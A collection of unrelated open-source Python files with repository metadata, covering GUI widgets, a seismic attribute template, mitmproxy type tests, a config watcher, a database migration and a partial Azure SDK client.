self.__busyWidget.setBusy( False )
def __updateLabels( self, pixel, color ) :
self.__positionLabel.setText( "<b>XY : %d %d</b>" % ( pixel.x, pixel.y ) )
self.__swatch.setColor( color )
if isinstance( color, imath.Color4f ) :
self.__rgbLabel.setText( "<b>RGBA : %.3f %.3f %.3f %.3f</b>" % ( color.r, color.g, color.b, color.a ) )
else :
self.__rgbLabel.setText( "<b>RGB : %.3f %.3f %.3f</b>" % ( color.r, color.g, color.b ) )
hsv = color.rgb2hsv()
self.__hsvLabel.setText( "<b>HSV : %.3f %.3f %.3f</b>" % ( hsv.r, hsv.g, hsv.b ) )
def __mouseMove( self, viewportGadget, event ) :
imageGadget = viewportGadget.getPrimaryChild()
l = viewportGadget.rasterToGadgetSpace( imath.V2f( event.line.p0.x, event.line.p0.y ), imageGadget )
try :
pixel = imageGadget.pixelAt( l )
except :
# `pixelAt()` can throw if there is an error
# computing the image being viewed. We leave
# the error reporting to other UI components.
return False
pixel = imath.V2f( math.floor( pixel.x ), math.floor( pixel.y ) ) # Origin
pixel = pixel + imath.V2f( 0.5 ) # Center
if pixel == self.__pixel :
return False
self.__pixel = pixel
self.__updateLazily()
return True
def __buttonPress( self, imageGadget, event ) :
if event.buttons != event.Buttons.Left or event.modifiers :
return False
return True # accept press so we get dragBegin()
def __dragBegin( self, imageGadget, event ) :
if event.buttons != event.Buttons.Left or event.modifiers :
return False
with Gaffer.Context( self.getContext() ) as c :
c["colorInspector:pixel"] = self.__pixel
try :
color = self.getPlug()["color"].getValue()
except :
# Error will be reported elsewhere in the UI
return None
GafferUI.Pointer.setCurrent( "rgba" )
return color
def __dragEnd( self, imageGadget, event ) :
GafferUI.Pointer.setCurrent( "" )
return True
##########################################################################
# _SoloChannelPlugValueWidget
##########################################################################
class _SoloChannelPlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
self.__button = GafferUI.MenuButton(
image = "soloChannel-1.png",
hasFrame = False,
menu = GafferUI.Menu(
Gaffer.WeakMethod( self.__menuDefinition ),
title = "Channel",
)
)
GafferUI.PlugValueWidget.__init__( self, self.__button, plug, **kw )
self._updateFromPlug()
def _updateFromPlug( self ) :
with Gaffer.Context() :
self.__button.setImage( "soloChannel{0}.png".format( self.getPlug().getValue() ) )
def __menuDefinition( self ) :
with self.getContext() :
soloChannel = self.getPlug().getValue()
m = IECore.MenuDefinition()
for name, value in [
( "All", -1 ),
( "R", 0 ),
( "G", 1 ),
( "B", 2 ),
( "A", 3 ),
] :
m.append(
"/" + name,
{
"command" : functools.partial( Gaffer.WeakMethod( self.__setValue ), value ),
"checkBox" : soloChannel == value
}
)
return m
def __setValue( self, value, *unused ) :
self.getPlug().setValue( value )
##########################################################################
# _StateWidget
##########################################################################
class _Spacer( GafferUI.Spacer ) :
def __init__( self, imageView, **kw ) :
GafferUI.Spacer.__init__( self, size = imath.V2i( 0, 25 ) )
## \todo This widget is basically the same as the SceneView and UVView ones. Perhaps the
# View base class should provide standard functionality for pausing and state, and we could
# use one standard widget for everything.
class _StateWidget( GafferUI.Widget ) :
def __init__( self, imageView, **kw ) :
row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )
GafferUI.Widget.__init__( self, row, **kw )
with row :
self.__busyWidget = GafferUI.BusyWidget( size = 20 )
self.__button = GafferUI.Button( hasFrame = False )
self.__imageGadget = imageView.viewportGadget().getPrimaryChild()
self.__button.clickedSignal().connect( Gaffer.WeakMethod( self.__buttonClick ), scoped = False )
self.__imageGadget.stateChangedSignal().connect( Gaffer.WeakMethod( self.__stateChanged ), scoped = False )
self.__update()
def __stateChanged( self, imageGadget ) :
self.__update()
def __buttonClick( self, button ) :
self.__imageGadget.setPaused( not self.__imageGadget.getPaused() )
self.__update()
def __update( self ) :
paused = self.__imageGadget.getPaused()
self.__button.setImage( "viewPause.png" if not paused else "viewPaused.png" )
self.__busyWidget.setBusy( self.__imageGadget.state() == self.__imageGadget.State.Running )
self.__button.setToolTip( "Viewer updates suspended, click to resume" if paused else "Click to suspend viewer updates [esc]" )
|
lucienfostier/gaffer
|
python/GafferImageUI/ImageViewUI.py
|
Python
|
bsd-3-clause
| 15,737
|
# External Attribute Skeleton
#
# Input: Single trace, single attribute
# Output: Single attribute
#
import sys,os
import numpy as np
#
# Import the module with the I/O scaffolding of the External Attribute
#
sys.path.insert(0, os.path.join(sys.path[0], '..'))
import extattrib as xa
#
# The attribute parameters - keep what you need
#
xa.params = {
'Inputs': ['Input'],
'ZSampMargin' : {'Value': [-30,30], 'Symmetric': True},
'Par_0' : {'Name': 'Parameter 0', 'Value': 0},
'Par_1' : {'Name': 'Parameter 1', 'Value': 1},
'Par_2' : {'Name': 'Parameter 2', 'Value': 2},
'Par_3' : {'Name': 'Parameter 3', 'Value': 3},
'Par_4' : {'Name': 'Parameter 4', 'Value': 4},
'Par_5' : {'Name': 'Parameter 5', 'Value': 5},
'Select' : {'Name': 'Option', 'Values': ['First', 'Second', 'Third'], 'Selection': 0},
'Parallel' : False,
'Help' : 'http://waynegm.github.io/OpendTect-Plugin-Docs/Attributes/ExternalAttrib/'
}
#
# Define the compute function
#
def doCompute():
#
# Initialise some constants from the attribute parameters or the SeismicInfo, xa.SI, array for use in the calculations
# These are just some examples - keep/add what you need
#
nyquist = 1.0/(2.0*xa.SI['zstep'])
par0 = xa.params['Par_0']['Value']
zw = xa.params['ZSampMargin']['Value'][1] - xa.params['ZSampMargin']['Value'][0] + 1
select = xa.params['Select']['Selection']
#
# This is the trace processing loop
#
while True:
xa.doInput()
#
# After doInput the TraceInfo, xa.TI, array contains information specific to this trace segment - keep what you need
#
number_of_samples = xa.TI['nrsamp']
start_time = xa.TI['z0']
current_inline = xa.TI['inl']
current_crossline = xa.TI['crl']
#
# Get the input
#
indata = xa.Input['Input'][0,0,:]
#
# Your attribute calculation goes here
#
outdata = indata
#------------------------------------------------------------------------------------
#
xa.Output = outdata
xa.doOutput()
#
# Assign the compute function to the attribute
#
xa.doCompute = doCompute
#
# Do it
#
xa.run(sys.argv[1:])
|
waynegm/OpendTect-Plugins
|
bin/python/wmpy/Skeletons/ex_single_trace_single_attribute_input_single_output.py
|
Python
|
gpl-3.0
| 2,026
|
import sys
import tensorflow as tf
def oracle_model(x, y):
return y, 0.0, tf.no_op()
def user_input_fn(filename_queue):
x = filename_queue.dequeue()
return {"x": x}, {"y": x}
def append_argv(*args):
command = "THIS_SHOULD_NEVER_MATCH"
if sys.argv[0] != command:
sys.argv = [command]
sys.argv += [*args]
|
raviqqe/tensorflow-qnd
|
qnd/test.py
|
Python
|
unlicense
| 344
|
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from twitter.pants.base.generator import TemplateData
class Exclude(object):
"""Represents a dependency exclude pattern to filter transitive dependencies against."""
def __init__(self, org, name = None):
self.org = org
self.name = name
def __eq__(self, other):
return other and (
type(other) == Exclude) and (
self.org == other.org) and (
self.name == other.name)
def __hash__(self):
value = 17
value *= 37 + hash(self.org)
value *= 37 + hash(self.name)
return value
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "Exclude(org='%s', name=%s)" % (self.org, ('%s' % self.name) if self.name else None)
def _create_template_data(self):
return TemplateData(
org = self.org,
name = self.name,
)
|
foursquare/commons-old
|
src/python/twitter/pants/targets/exclude.py
|
Python
|
apache-2.0
| 1,720
|
from __future__ import division
import numpy as np
import math
from utils import *
from geom import *
from mcmc import *
def make_exp_test_disk(xmax, ymax, modelParams):
vmax, c, pa, incl = modelParams
x = []
y = []
for i, yi in enumerate(np.linspace(-ymax, ymax, 2*ymax+1)):
for j, xi in enumerate(np.linspace(-xmax, xmax, 2*xmax+1)):
#print i, j, xi, yi
x.append(xi)
y.append(yi)
#print yi, xi
x = np.reshape(x, (len(x), 1))
y = np.reshape(y, (len(y), 1))
#cutting out a round disk
radius = np.where(np.sqrt(x**2 + y**2) < xmax)
x = x[radius]
y = y[radius]
X = np.empty((x.shape[0], len(incl)))
Y = X.copy()
model_vel = X.copy()
for l in range(0, len(incl)):
print l
X[:, l] = x
Y[:, l] = y
for i, inclination in enumerate(incl):
print np.degrees(pa), np.degrees(inclination), 'pa, incl at make disk'
Y[:, i] = Y[:, i]*np.cos(inclination) #projection
#rotating by PA, projecting
X[:, i], Y[:, i] = rotateGalaxy(X[:, i], Y[:, i], pa)
data = (X[:, i], Y[:, i], 5) #x, y, vel, vel_err, r50 = data
model_vel[:, i] = expModel(modelParams, data)
#simple_plot(X, Y, model_vel, 'img/models/exp_test.png')
return X, Y, model_vel, 0.1*model_vel
def make_test_disk(xmax, ymax, modelParams):
x = []
y = []
vc, c, gamma, pa, incl = modelParams
for i, yi in enumerate(np.linspace(-ymax, ymax, 2*ymax+1)):
for j, xi in enumerate(np.linspace(-xmax, xmax, 2*xmax+1)):
#print i, j, xi, yi
x.append(xi)
y.append(yi)
#print yi, xi
x = np.reshape(x, (len(x), 1))
y = np.reshape(y, (len(y), 1))
#cutting out a round disk
radius = np.where(np.sqrt(x**2 + y**2) < xmax)
x = x[radius]
y = y[radius]
X = np.empty((x.shape[0], len(incl)))
Y = X.copy()
model_vel = X.copy()
for l in range(0, len(incl)):
print l
X[:, l] = x
Y[:, l] = y
for i, inclination in enumerate(incl):
Y[:, i] = Y[:, i]*np.cos(inclination) #projection
#rotating by PA, projecting
X[:, i], Y[:, i] = rotateGalaxy(X[:, i], Y[:, i], pa)
data = (X[:, i], Y[:, i], np.zeros((X.shape)), np.zeros((Y.shape)), 5) #5 -- dummy R_e parameter
params = (vc, c, gamma, pa, inclination)
model_vel[:, i] = model2_Courteau(params, data)
model_vel[:, i] = model_vel[:, i]
simple_plot(X, Y, model_vel, 'img/models/test.png')
return X, Y, model_vel, 10*np.ones((model_vel.shape))
|
astrolitterbox/SAMI
|
test_disk.py
|
Python
|
gpl-2.0
| 2,454
|
import pytest
import os
import typing
import contextlib
import mitmproxy.exceptions
import mitmproxy.types
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy import command
from mitmproxy import flow
from . import test_command
@contextlib.contextmanager
def chdir(path: str):
old_dir = os.getcwd()
os.chdir(path)
yield
os.chdir(old_dir)
def test_bool():
with taddons.context() as tctx:
b = mitmproxy.types._BoolType()
assert b.completion(tctx.master.commands, bool, "b") == ["false", "true"]
assert b.parse(tctx.master.commands, bool, "true") is True
assert b.parse(tctx.master.commands, bool, "false") is False
assert b.is_valid(tctx.master.commands, bool, True) is True
assert b.is_valid(tctx.master.commands, bool, "foo") is False
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, bool, "foo")
def test_str():
with taddons.context() as tctx:
b = mitmproxy.types._StrType()
assert b.is_valid(tctx.master.commands, str, "foo") is True
assert b.is_valid(tctx.master.commands, str, 1) is False
assert b.completion(tctx.master.commands, str, "") == []
assert b.parse(tctx.master.commands, str, "foo") == "foo"
def test_unknown():
with taddons.context() as tctx:
b = mitmproxy.types._UnknownType()
assert b.is_valid(tctx.master.commands, mitmproxy.types.Unknown, "foo") is False
assert b.is_valid(tctx.master.commands, mitmproxy.types.Unknown, 1) is False
assert b.completion(tctx.master.commands, mitmproxy.types.Unknown, "") == []
assert b.parse(tctx.master.commands, mitmproxy.types.Unknown, "foo") == "foo"
def test_int():
with taddons.context() as tctx:
b = mitmproxy.types._IntType()
assert b.is_valid(tctx.master.commands, int, "foo") is False
assert b.is_valid(tctx.master.commands, int, 1) is True
assert b.completion(tctx.master.commands, int, "b") == []
assert b.parse(tctx.master.commands, int, "1") == 1
assert b.parse(tctx.master.commands, int, "999") == 999
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, int, "foo")
def test_path(tdata, monkeypatch):
with taddons.context() as tctx:
b = mitmproxy.types._PathType()
assert b.parse(tctx.master.commands, mitmproxy.types.Path, "/foo") == "/foo"
assert b.parse(tctx.master.commands, mitmproxy.types.Path, "/bar") == "/bar"
monkeypatch.setenv("HOME", "/home/test")
monkeypatch.setenv("USERPROFILE", "/home/test")
assert b.parse(tctx.master.commands, mitmproxy.types.Path, "~/mitm") == "/home/test/mitm"
assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, "foo") is True
assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, "~/mitm") is True
assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, 3) is False
def normPathOpts(prefix, match):
ret = []
for s in b.completion(tctx.master.commands, mitmproxy.types.Path, match):
s = s[len(prefix):]
s = s.replace(os.sep, "/")
ret.append(s)
return ret
cd = os.path.normpath(tdata.path("mitmproxy/completion"))
assert normPathOpts(cd, cd) == ['/aaa', '/aab', '/aac', '/bbb/']
assert normPathOpts(cd, os.path.join(cd, "a")) == ['/aaa', '/aab', '/aac']
with chdir(cd):
assert normPathOpts("", "./") == ['./aaa', './aab', './aac', './bbb/']
assert normPathOpts("", "") == ['./aaa', './aab', './aac', './bbb/']
assert b.completion(
tctx.master.commands, mitmproxy.types.Path, "nonexistent"
) == ["nonexistent"]
def test_cmd():
with taddons.context() as tctx:
tctx.master.addons.add(test_command.TAddon())
b = mitmproxy.types._CmdType()
assert b.is_valid(tctx.master.commands, mitmproxy.types.Cmd, "foo") is False
assert b.is_valid(tctx.master.commands, mitmproxy.types.Cmd, "cmd1") is True
assert b.parse(tctx.master.commands, mitmproxy.types.Cmd, "cmd1") == "cmd1"
with pytest.raises(mitmproxy.exceptions.TypeError):
assert b.parse(tctx.master.commands, mitmproxy.types.Cmd, "foo")
assert len(
b.completion(tctx.master.commands, mitmproxy.types.Cmd, "")
) == len(tctx.master.commands.commands.keys())
def test_cutspec():
with taddons.context() as tctx:
b = mitmproxy.types._CutSpecType()
b.parse(tctx.master.commands, mitmproxy.types.CutSpec, "foo,bar") == ["foo", "bar"]
assert b.is_valid(tctx.master.commands, mitmproxy.types.CutSpec, 1) is False
assert b.is_valid(tctx.master.commands, mitmproxy.types.CutSpec, "foo") is False
assert b.is_valid(tctx.master.commands, mitmproxy.types.CutSpec, "request.path") is True
assert b.completion(
tctx.master.commands, mitmproxy.types.CutSpec, "request.p"
) == b.valid_prefixes
ret = b.completion(tctx.master.commands, mitmproxy.types.CutSpec, "request.port,f")
assert ret[0].startswith("request.port,")
assert len(ret) == len(b.valid_prefixes)
def test_arg():
with taddons.context() as tctx:
b = mitmproxy.types._ArgType()
assert b.completion(tctx.master.commands, mitmproxy.types.CmdArgs, "") == []
assert b.parse(tctx.master.commands, mitmproxy.types.CmdArgs, "foo") == "foo"
assert b.is_valid(tctx.master.commands, mitmproxy.types.CmdArgs, 1) is False
def test_strseq():
with taddons.context() as tctx:
b = mitmproxy.types._StrSeqType()
assert b.completion(tctx.master.commands, typing.Sequence[str], "") == []
assert b.parse(tctx.master.commands, typing.Sequence[str], "foo") == ["foo"]
assert b.parse(tctx.master.commands, typing.Sequence[str], "foo,bar") == ["foo", "bar"]
assert b.is_valid(tctx.master.commands, typing.Sequence[str], ["foo"]) is True
assert b.is_valid(tctx.master.commands, typing.Sequence[str], ["a", "b", 3]) is False
assert b.is_valid(tctx.master.commands, typing.Sequence[str], 1) is False
assert b.is_valid(tctx.master.commands, typing.Sequence[str], "foo") is False
class DummyConsole:
@command.command("view.flows.resolve")
def resolve(self, spec: str) -> typing.Sequence[flow.Flow]:
if spec == "err":
raise mitmproxy.exceptions.CommandError()
n = int(spec)
return [tflow.tflow(resp=True)] * n
@command.command("cut")
def cut(self, spec: str) -> mitmproxy.types.Data:
return [["test"]]
@command.command("options")
def options(self) -> typing.Sequence[str]:
return ["one", "two", "three"]
def test_flow():
with taddons.context() as tctx:
tctx.master.addons.add(DummyConsole())
b = mitmproxy.types._FlowType()
assert len(b.completion(tctx.master.commands, flow.Flow, "")) == len(b.valid_prefixes)
assert b.parse(tctx.master.commands, flow.Flow, "1")
assert b.is_valid(tctx.master.commands, flow.Flow, tflow.tflow()) is True
assert b.is_valid(tctx.master.commands, flow.Flow, "xx") is False
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, flow.Flow, "0")
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, flow.Flow, "2")
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, flow.Flow, "err")
def test_flows():
with taddons.context() as tctx:
tctx.master.addons.add(DummyConsole())
b = mitmproxy.types._FlowsType()
assert len(
b.completion(tctx.master.commands, typing.Sequence[flow.Flow], "")
) == len(b.valid_prefixes)
assert b.is_valid(tctx.master.commands, typing.Sequence[flow.Flow], [tflow.tflow()]) is True
assert b.is_valid(tctx.master.commands, typing.Sequence[flow.Flow], "xx") is False
assert b.is_valid(tctx.master.commands, typing.Sequence[flow.Flow], 0) is False
assert len(b.parse(tctx.master.commands, typing.Sequence[flow.Flow], "0")) == 0
assert len(b.parse(tctx.master.commands, typing.Sequence[flow.Flow], "1")) == 1
assert len(b.parse(tctx.master.commands, typing.Sequence[flow.Flow], "2")) == 2
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, typing.Sequence[flow.Flow], "err")
def test_data():
with taddons.context() as tctx:
b = mitmproxy.types._DataType()
assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, 0) is False
assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, []) is True
assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, [["x"]]) is True
assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, [[b"x"]]) is True
assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, [[1]]) is False
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, mitmproxy.types.Data, "foo")
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, mitmproxy.types.Data, "foo")
def test_choice():
with taddons.context() as tctx:
tctx.master.addons.add(DummyConsole())
b = mitmproxy.types._ChoiceType()
assert b.is_valid(
tctx.master.commands,
mitmproxy.types.Choice("options"),
"one",
) is True
assert b.is_valid(
tctx.master.commands,
mitmproxy.types.Choice("options"),
"invalid",
) is False
assert b.is_valid(
tctx.master.commands,
mitmproxy.types.Choice("nonexistent"),
"invalid",
) is False
comp = b.completion(tctx.master.commands, mitmproxy.types.Choice("options"), "")
assert comp == ["one", "two", "three"]
assert b.parse(tctx.master.commands, mitmproxy.types.Choice("options"), "one") == "one"
with pytest.raises(mitmproxy.exceptions.TypeError):
b.parse(tctx.master.commands, mitmproxy.types.Choice("options"), "invalid")
def test_typemanager():
assert mitmproxy.types.CommandTypes.get(bool, None)
assert mitmproxy.types.CommandTypes.get(mitmproxy.types.Choice("choide"), None)
|
vhaupert/mitmproxy
|
test/mitmproxy/test_types.py
|
Python
|
mit
| 10,575
|
import logging
import threading
from concurrent import futures
from .monitor import ConfigFileMonitor
from lighthouse.events import wait_on_event
MAX_WORKERS = 8
logger = logging.getLogger(__name__)
class ConfigWatcher(object):
"""
Base class for watchers that monitor and maintain `Configurable` instances.
Subclasses define which `Configurable` subclasses they watch via the
`watched_configurables` attribute as well as implement the `run()` and
`wind_down()` methods.
Optionally, subclasses can also define "on_<configurable>_<action>" methods
(e.g. "on_service_update") that will hook into the add/update/remove
configurable callbacks.
.. warning::
Care must be taken that these hooks are idempotent with regards
to the Watcher subclass instance. Configuration changes are liable to
happen at any time and in any order.
"""
# the list or tuple of Configurable subclasses to watch
watched_configurables = ()
def __init__(self, config_dir):
self.config_dir = config_dir
self.observers = []
self.configurables = {}
for config_class in self.watched_configurables:
self.configurables[config_class] = {}
self.work_pool = futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)
self.thread_pool = {}
self.shutdown = threading.Event()
def start(self):
"""
Iterates over the `watched_configurabes` attribute and starts a
config file monitor for each. The resulting observer threads are
kept in an `observers` list attribute.
"""
for config_class in self.watched_configurables:
monitor = ConfigFileMonitor(config_class, self.config_dir)
self.observers.append(
monitor.start(
self.add_configurable,
self.update_configurable,
self.remove_configurable
)
)
wait_on_event(self.shutdown)
def wind_down(self):
"""
This method is called in the `stop()` method once the config file
observers are stopped but before any threads are joined.
Subclasses are expected to implement this.
"""
raise NotImplementedError
def launch_thread(self, name, fn, *args, **kwargs):
"""
Adds a named thread to the "thread pool" dictionary of Thread objects.
A daemon thread that executes the passed-in function `fn` with the
given args and keyword args is started and tracked in the `thread_pool`
attribute with the given `name` as the key.
"""
logger.debug(
"Launching thread '%s': %s(%s, %s)", name,
fn, args, kwargs
)
self.thread_pool[name] = threading.Thread(
target=fn, args=args, kwargs=kwargs
)
self.thread_pool[name].daemon = True
self.thread_pool[name].start()
def kill_thread(self, name):
"""
Joins the thread in the `thread_pool` dict with the given `name` key.
"""
if name not in self.thread_pool:
return
self.thread_pool[name].join()
del self.thread_pool[name]
def add_configurable(self, configurable_class, name, configurable):
"""
Callback fired when a configurable instance is added.
Adds the configurable to the proper "registry" and calls a method
named "on_<configurable classname>_add" in the work pool if the hook
is defined.
If the added configurable is already present, `update_configurable()`
is called instead.
"""
configurable_class_name = configurable_class.__name__.lower()
logger.info("Adding %s: '%s'", configurable_class_name, name)
registry = self.registry_for(configurable_class)
if name in registry:
logger.warn(
"Adding already-existing %s: '%s'",
configurable_class_name, name
)
registry[name] = configurable
hook = self.hook_for(configurable_class, action="add")
if not hook:
return
def done(f):
try:
f.result()
except Exception:
logger.exception("Error adding configurable '%s'", name)
self.work_pool.submit(hook, configurable).add_done_callback(done)
def update_configurable(self, configurable_class, name, config):
"""
Callback fired when a configurable instance is updated.
Looks up the existing configurable in the proper "registry" and
`apply_config()` is called on it.
If a method named "on_<configurable classname>_update" is defined it
is called in the work pool and passed the configurable's name, the old
config and the new config.
If the updated configurable is not present, `add_configurable()` is
called instead.
"""
configurable_class_name = configurable_class.__name__.lower()
logger.info(
"updating %s: '%s'", configurable_class_name, name
)
registry = self.registry_for(configurable_class)
if name not in registry:
logger.warn(
"Tried to update unknown %s: '%s'",
configurable_class_name, name
)
self.add_configurable(
configurable_class,
configurable_class.from_config(name, config)
)
return
registry[name].apply_config(config)
hook = self.hook_for(configurable_class, "update")
if not hook:
return
def done(f):
try:
f.result()
except Exception:
logger.exception("Error updating configurable '%s'", name)
self.work_pool.submit(hook, name, config).add_done_callback(done)
def remove_configurable(self, configurable_class, name):
"""
Callback fired when a configurable instance is removed.
Looks up the existing configurable in the proper "registry" and
removes it.
If a method named "on_<configurable classname>_remove" is defined it
is called via the work pooland passed the configurable's name.
If the removed configurable is not present, a warning is given and no
further action is taken.
"""
configurable_class_name = configurable_class.__name__.lower()
logger.info("Removing %s: '%s'", configurable_class_name, name)
registry = self.registry_for(configurable_class)
if name not in registry:
logger.warn(
"Tried to remove unknown active %s: '%s'",
configurable_class_name, name
)
return
hook = self.hook_for(configurable_class, action="remove")
if not hook:
registry.pop(name)
return
def done(f):
try:
f.result()
registry.pop(name)
except Exception:
logger.exception("Error removing configurable '%s'", name)
self.work_pool.submit(hook, name).add_done_callback(done)
def registry_for(self, configurable_class):
"""
Helper method for retrieving the "registry" dictionary of a given
Configurable subclass.
For example, the registry of Cluster instances for a config watcher
would be `self.configurables[Cluster]`.
"""
return self.configurables[configurable_class]
def hook_for(self, configurable_class, action):
"""
Helper method for determining if an on_<configurable class>_<action>
method is present, to be used as a hook in the add/update/remove
configurable methods.
"""
configurable_class_name = configurable_class.__name__.lower()
return getattr(
self,
"on_" + configurable_class_name + "_" + action,
None
)
def stop(self):
"""
Method for shutting down the watcher.
All config file observers are stopped and their threads joined, along
with the worker thread pool.
"""
self.shutdown.set()
for monitor in self.observers:
monitor.stop()
self.wind_down()
for monitor in self.observers:
monitor.join()
for thread in self.thread_pool.values():
thread.join()
self.work_pool.shutdown()
|
wglass/lighthouse
|
lighthouse/configs/watcher.py
|
Python
|
apache-2.0
| 8,582
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'BudgetLine'
db.create_table('budget_lines_budgetline', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(db_index=True,max_length=256)),
('budget_id', self.gf('django.db.models.fields.CharField')(max_length=64, db_index=True)),
('amount_allocated', self.gf('django.db.models.fields.PositiveIntegerField')()),
('amount_used', self.gf('django.db.models.fields.PositiveIntegerField')()),
('year', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('containing_line', self.gf('django.db.models.fields.related.ForeignKey')(related_name='sublines', null=True, to=orm['budget_lines.BudgetLine'])),
))
db.send_create_signal('budget_lines', ['BudgetLine'])
def backwards(self, orm):
# Deleting model 'BudgetLine'
db.delete_table('budget_lines_budgetline')
models = {
'budget_lines.budgetline': {
'Meta': {'object_name': 'BudgetLine'},
'amount_allocated': ('django.db.models.fields.PositiveIntegerField', [], {}),
'amount_used': ('django.db.models.fields.PositiveIntegerField', [], {}),
'budget_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'containing_line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sublines'", 'null': 'True', 'to': "orm['budget_lines.BudgetLine']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True','max_length':'256'}),
'year': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
}
}
complete_apps = ['budget_lines']
|
daonb/obudget
|
src/server/budget_lines/migrations/0001_initial.py
|
Python
|
bsd-3-clause
| 2,111
|
import unittest
from ieml.dictionary.dictionary import Dictionary
import numpy as np
from ieml.dictionary.script import Script
from ieml.ieml_database import IEMLDatabase, GitInterface
class DictionaryTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.d = IEMLDatabase(folder=GitInterface().folder).get_dictionary()
def test_scripts(self):
self.assertIsInstance(self.d.scripts, np.ndarray)
self.assertEqual(self.d.scripts.ndim, 1)
self.assertEqual(self.d.scripts.shape, (len(self.d),))
for s in self.d.scripts:
self.assertIsInstance(s, Script)
#
# def test_one_hot(self):
# for i, s in enumerate(self.d.scripts):
# oh = self.d.one_hot(s)
#
# self.assertIsInstance(oh, np.ndarray)
# self.assertEqual(oh.ndim, 1)
# self.assertEqual(oh.shape, (len(self.d),))
# self.assertEqual(oh.dtype, int)
#
# self.assertTrue(all(e == 0 for j, e in enumerate(oh) if j != i))
# # print(oh[i-2:i+2], s)
#
# self.assertEqual(oh[i], 1)
|
IEMLdev/propositions-restful-server
|
ieml/test/dictionary/test_dictionary.py
|
Python
|
gpl-3.0
| 1,134
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DesktopsOperations:
"""DesktopsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~desktop_virtualization_api_client.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
application_group_name: str,
desktop_name: str,
**kwargs: Any
) -> "_models.Desktop":
"""Get a desktop.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param application_group_name: The name of the application group.
:type application_group_name: str
:param desktop_name: The name of the desktop within the specified desktop group.
:type desktop_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Desktop, or the result of cls(response)
:rtype: ~desktop_virtualization_api_client.models.Desktop
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Desktop"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-03-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'applicationGroupName': self._serialize.url("application_group_name", application_group_name, 'str', max_length=64, min_length=3),
'desktopName': self._serialize.url("desktop_name", desktop_name, 'str', max_length=24, min_length=3),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
